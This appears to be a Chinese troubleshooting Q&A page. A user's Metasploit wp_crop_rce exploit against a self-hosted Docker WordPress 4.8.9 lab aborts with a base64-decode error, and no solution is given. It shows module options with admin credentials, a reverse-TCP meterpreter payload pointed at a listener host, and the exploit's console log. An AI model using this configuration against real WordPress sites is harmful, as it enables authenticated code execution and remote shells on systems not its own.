问题描述
所以。我在 metasploit 上遇到了一些问题。 我试图利用 利用/multi/http/wp_crop_rce。
我正在使用 Docker,为了安装 wordpress 版本:4.8.9。
PHP 7.2.12 (cli)(构建时间:2018 年 11 月 28 日 22:58:16)(NTS) 版权所有 (c) 1997-2018 PHP Group Zend Engine v3.2.0,版权所有 (c) 1998-2018 Zend Technologies 使用 Zend OPcache v7.2.12,版权所有 (c) 1999-2018,由 Zend Technologies 提供
wordpress 版本:4.8.9 metasploit:最新版本
Module options (exploit/multi/http/wp_crop_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD password1234 yes The WordPress password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 172.17.0.1 yes The target host(s),range CIDR identifier,or hosts file with syntax 'file:<path>'
RPORT 8000 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to the wordpress application
USERNAME admin yes The WordPress username to authenticate with
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.91.130 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 WordPress
预期行为
应该没有任何错误地运行,meterpreter 会话将打开。
当前行为 -> 找不到 Base64 解码错误。
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload
[+] Image uploaded
[*] Including into theme
[-] **Exploit aborted due to failure: not-found: Can't find base64 decode on target**
[*] Exploit completed,but no session was created.
Ubuntu 机器
解决方法
暂无找到可以解决该程序问题的有效方法,小编努力寻找整理中!
如果你已经找到好的解决方法,欢迎将解决方案带上本链接一起发送给小编。
小编邮箱:dio#foxmail.com (将#修改为@)